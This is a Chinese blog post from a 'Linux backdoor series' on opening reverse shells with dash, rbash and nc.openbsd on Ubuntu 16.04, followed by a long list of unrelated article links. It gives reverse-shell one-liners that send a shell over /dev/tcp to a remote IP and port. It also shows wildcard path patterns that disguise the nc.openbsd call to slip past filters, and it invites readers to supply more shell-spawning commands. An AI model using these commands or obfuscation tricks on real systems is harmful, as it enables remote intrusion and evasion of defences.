dash & rbash & nc.openbsd | Linux 后门系列
时间:2022-07-23
本文章向大家介绍dash & rbash & nc.openbsd | Linux 后门系列,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
今天在查找资料的时候在一篇文章中发现了 dash 和 nc.openbsd 这两个命令,dash、rbash、nc.openbsd 和 nc.traditional 这几个命令平时都很少遇到,所以一直也就不知道他们的存在,这次也是争取把这些补齐了,后续还有那些系统自带的可以反弹shell的命令我遗漏了大家可以反馈给我,我也学习一下
0x01 dash & rbash
每个系统自带的shell貌似都不太一样,sh 和 bash 基本上是每个系统都有的,如何查看每个系统支持的 shell 呢?
cat /etc/shells
很多系统还会自带 zsh ,Ubuntu 16.04 中并不包含 zsh
Ubuntu 16.04 默认带 dash 和 rbash,使用方法和bash一样
- dash -i >& /dev/tcp/192.168.1.101/5555 0>&1
- rbash -i >& /dev/tcp/192.168.1.101/5555 0>&1
0x02 nc.openbsd
nc 有几个版本,一般系统会自带:
- nc
- nc.openbsd / nc.traditional
Ubuntu 16.04 自带 nc.openbsd 但是不自带 nc.traditional , nc.openbsd 同样可以实现反弹 shell 的功能
nc.openbsd 和 nc 使用方法一样,如下:
那么 nc 和 nc.openbsd 在哪个目录呢?
- /bin/nc
- /bin/nc.openbsd
这回如果你想用之前我说的 ` + * 方案,就知道怎么构造了
- /b*n/*.open*sd
- /b*n/*.*pen*sd
- /*in/*.*pen*sd
- 生产环境大型sql语句调优实战第一篇(一) (r2笔记第31天)
- 讨论 | 你是否遇到过你完全不能理解的机器学习概念?
- 【专业技术】C++里面重要的几个关键字的用法
- sql monitor的使用(一) (r2第30天)
- sql_profile的使用(一) (r2笔记29天)
- 关于权限设置的一个小把戏(r2第27天)
- R语言实现混合模型
- 数据迁移判断非空约束(r2笔记45天)
- 【专业技术】linux下socket编程
- oracle并行的小细节(r2笔记44天)
- python实现朴素贝叶斯模型:文本分类+垃圾邮件分类
- 使用闪回查询备份数据(r2笔记43天)
- 生产环境sql语句调优实战第四篇(r2笔记41天)
- 生产环境sql语句调优实战第五篇(r2笔记41天)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 【剑指Offer】二叉树的镜像
- Python实战之利用数据字典实现井字棋盘,
- scRNA-seq Clustering quality control
- Python实战之tkinter库画图,用canver画布教你画卡通人物!
- Python教程之正则表达式(基础篇)
- Python教程之正则表达式(提高篇)
- 【剑指Offer】树的子结构
- 【剑指Offer】合并两个排序的链表
- Python实战之特定文本提取,挑战高效办公的第一步
- 【剑指Offer】调整数组顺序使奇数位于偶数前面
- 【剑指Offer】链表中倒数第 k 个节点
- 【剑指Offer】调整数组顺序使奇数位于偶数前面
- 【剑指Offer】复杂链表的复制
- 【剑指Offer】二叉树中和为某一值的路径
- 【剑指Offer】二叉搜索树的后序遍历序列